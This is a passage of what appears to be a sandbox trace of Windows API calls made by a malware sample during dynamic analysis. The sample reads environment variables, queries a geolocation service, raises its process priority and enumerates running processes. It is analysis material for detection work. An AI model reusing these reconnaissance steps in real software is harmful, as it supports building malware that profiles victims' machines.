lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0049.265] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x24) returned 0x65a790 [0049.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x65a790, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0049.265] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6615c0) returned 0x5c [0049.265] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6615c0, Size=0x60) returned 0x6615c0 [0049.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0049.265] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x29) returned 0x65ae68 [0049.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x65ae68, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0049.265] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6615c0) returned 0x60 [0049.265] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6615c0, Size=0x64) returned 0x6615c0 [0049.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0049.265] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x1e) returned 0x65ecc8 [0049.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x65ecc8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0049.265] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6615c0) returned 0x64 [0049.265] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6615c0, Size=0x68) returned 0x6615c0 [0049.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0049.265] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x41) returned 0x656958 [0049.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x656958, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0049.266] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6615c0) returned 0x68 [0049.266] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6615c0, Size=0x6c) returned 0x6615c0 [0049.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0049.266] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x17) returned 0x661638 [0049.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x661638, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0049.266] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6615c0) returned 0x6c [0049.266] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6615c0, Size=0x70) returned 0x6615c0 [0049.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0049.266] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0xf) returned 0x65e470 [0049.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x65e470, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0049.266] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x6615c0) returned 0x70 [0049.266] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x6615c0, Size=0x74) returned 0x661658 [0049.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0049.266] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x16) returned 0x6615c0 [0049.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x6615c0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0049.266] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x661658) returned 0x74 [0049.266] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x661658, Size=0x78) returned 0x661658 [0049.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0049.266] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x2a) returned 0x65aea0 [0049.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x65aea0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0049.266] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x661658) returned 0x78 [0049.266] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x661658, Size=0x7c) returned 0x661658 [0049.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0049.267] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x29) returned 0x65aed8 [0049.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x65aed8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0049.267] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x661658) returned 0x7c [0049.267] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x661658, Size=0x80) returned 0x661658 [0049.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0049.267] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x15) returned 0x6615e0 [0049.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x6615e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0049.267] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x661658) returned 0x80 [0049.267] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x661658, Size=0x84) returned 0x661658 [0049.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0049.267] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x1e) returned 0x65ecf0 [0049.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x65ecf0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0049.267] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x661658) returned 0x84 [0049.267] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x661658, Size=0x88) returned 0x661658 [0049.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0049.267] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x2a) returned 0x65af10 [0049.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x65af10, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0049.267] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x661658) returned 0x88 [0049.267] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x661658, Size=0x8c) returned 0x661658 [0049.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0049.267] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x12) returned 0x661600 [0049.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x661600, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0049.268] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x661658) returned 0x8c [0049.268] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x661658, Size=0x90) returned 0x661658 [0049.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0049.268] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x18) returned 0x6616f0 [0049.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x6616f0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0049.268] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x661658) returned 0x90 [0049.268] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x661658, Size=0x94) returned 0x661710 [0049.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0049.268] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x8, Size=0x46) returned 0x6569a8 [0049.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x6569a8, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0049.268] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x661710) returned 0x94 [0049.268] RtlReAllocateHeap (Heap=0x640000, Flags=0x0, Ptr=0x661710, Size=0x98) returned 0x661710 [0049.317] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x660c88) returned 0x80 [0049.317] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x660c88) returned 0x80 [0049.318] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x660c88) returned 0x80 [0049.324] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x8ec) returned 0x6617b0 [0049.354] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x660c88) returned 0x80 [0049.354] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x10) returned 0x65e488 [0049.354] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x660c88) returned 0x80 [0049.354] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x660c88) returned 0x80 [0049.355] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x660c88) returned 0x80 [0049.477] RtlSizeHeap (HeapHandle=0x640000, Flags=0x0, MemoryPointer=0x660c88) returned 0x80 [0049.485] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0051.717] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x40) returned 0x655878 [0051.717] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0063.660] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18b6f8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18def8 | out: lpBuffer=0x18b6f8*, lpdwNumberOfBytesRead=0x18def8*=0x1d1) returned 1 [0063.661] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0063.665] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0063.665] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x20) returned 0x66d678 [0063.674] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x1e0) returned 0x3333480 [0063.699] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x3333480 | out: hHeap=0x640000) returned 1 [0063.707] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x66d678 | out: hHeap=0x640000) returned 1 [0063.707] HeapFree (in: hHeap=0x640000, dwFlags=0x0, lpMem=0x655878 | out: hHeap=0x640000) returned 1 [0063.708] GetCurrentProcess () returned 0xffffffff [0063.708] GetLastError () returned 0x2 [0063.708] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0063.723] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x10) returned 0x692938 [0063.723] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x8ec) returned 0x3357c58 [0063.731] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x800) returned 0x334a208 [0063.731] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x334a208, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\%localappdata%24fd5b09-6d4d-435f-beb9-3d272f67be2csample.exe.exe")) returned 0x66 [0063.731] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0063.739] RtlAllocateHeap (HeapHandle=0x640000, Flags=0x0, Size=0x810) returned 0x334aa10 [0063.739] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" " [0063.739] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" ", pNumArgs=0x18dfd8 | out: pNumArgs=0x18dfd8) returned 0x726160*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" [0063.739] lstrcpyW (in: lpString1=0x18ec68, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" [0063.756] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" " [0063.756] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" ", pNumArgs=0x18df74 | out: pNumArgs=0x18df74) returned 0x726160*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" [0063.756] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe") returned="%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe" [0063.756] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0063.759] GetProcAddress (hModule=0x76e10000, lpProcName="EnumProcesses") returned 0x0 [0063.759] GetProcAddress (hModule=0x76e10000, lpProcName="EnumProcessModules") returned 0x0 [0063.760] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleBaseNameW") returned 0x0 [0063.760] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x74fe0000 [0063.812] GetProcAddress (hModule=0x74fe0000, lpProcName="EnumProcesses") returned 0x74fe1544 [0063.812] GetProcAddress (hModule=0x74fe0000, lpProcName="EnumProcessModules") returned 0x74fe1408 [0063.813] GetProcAddress (hModule=0x74fe0000, lpProcName="GetModuleBaseNameW") returned 0x74fe152c [0063.813] EnumProcesses (in: lpidProcess=0x183770, cb=0xa000, lpcbNeeded=0x18df80 | out: lpidProcess=0x183770, lpcbNeeded=0x18df80) returned 1 [0063.818] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0063.819] CloseHandle (hObject=0x0) returned 0 [0063.819] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0063.819] CloseHandle (hObject=0x0) returned 0 [0063.819] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0063.819] CloseHandle (hObject=0x0) returned 0 [0063.819] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0063.819] CloseHandle (hObject=0x0) returned 0 [0063.819] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0063.819] CloseHandle (hObject=0x0) returned 0 [0063.819] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0063.819] CloseHandle (hObject=0x0) returned 0 [0063.819] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0063.819] CloseHandle (hObject=0x0) returned 0 [0063.820] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0063.820] CloseHandle (hObject=0x0) returned 0 [0063.820] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0063.820] CloseHandle (hObject=0x0) returned 0 [0063.820] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0063.820] CloseHandle (hObject=0x0) returned 0 [0063.820] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0063.820] CloseHandle (hObject=0x0) returned 0 [0063.820] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0063.820] CloseHandle (hObject=0x0) returned 0 [0063.820] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0063.820] CloseHandle (hObject=0x0) returned 0 [0063.820] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0063.821] CloseHandle (hObject=0x0) returned 0 [0063.821] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0063.821] CloseHandle (hObject=0x0) returned 0 [0063.821] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0063.821] CloseHandle (hObject=0x0) returned 0 [0063.821] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0063.821] CloseHandle (hObject=0x0) returned 0 [0063.821] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0063.821] CloseHandle (hObject=0x0) returned 0 [0063.821] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x5c0 [0063.821] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 0 [0063.822] CloseHandle (hObject=0x5c0) returned 1 [0063.822] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5c0 [0063.822] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 0 [0063.822] CloseHandle (hObject=0x5c0) returned 1 [0063.822] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x46c) returned 0x0 [0063.822] CloseHandle (hObject=0x0) returned 0 [0063.822] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4a8) returned 0x5c0 [0063.823] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 0 [0063.823] CloseHandle (hObject=0x5c0) returned 1 [0063.823] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c4) returned 0x0 [0063.823] CloseHandle (hObject=0x0) returned 0 [0063.823] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x530) returned 0x5c0 [0063.823] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 0 [0063.823] CloseHandle (hObject=0x5c0) returned 1 [0063.823] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x720) returned 0x0 [0063.824] CloseHandle (hObject=0x0) returned 0 [0063.824] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5cc) returned 0x0 [0063.824] CloseHandle (hObject=0x0) returned 0 [0063.824] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x674) returned 0x0 [0063.824] CloseHandle (hObject=0x0) returned 0 [0063.824] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x738) returned 0x0 [0063.824] CloseHandle (hObject=0x0) returned 0 [0063.824] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x734) returned 0x5c0 [0063.824] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.826] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xc30000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="carnival_surprising_ii.exe") returned 0x1a [0063.826] CloseHandle (hObject=0x5c0) returned 1 [0063.826] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x54c) returned 0x5c0 [0063.827] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.828] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xd0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="humor jordan.exe") returned 0x10 [0063.828] CloseHandle (hObject=0x5c0) returned 1 [0063.828] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x664) returned 0x5c0 [0063.829] 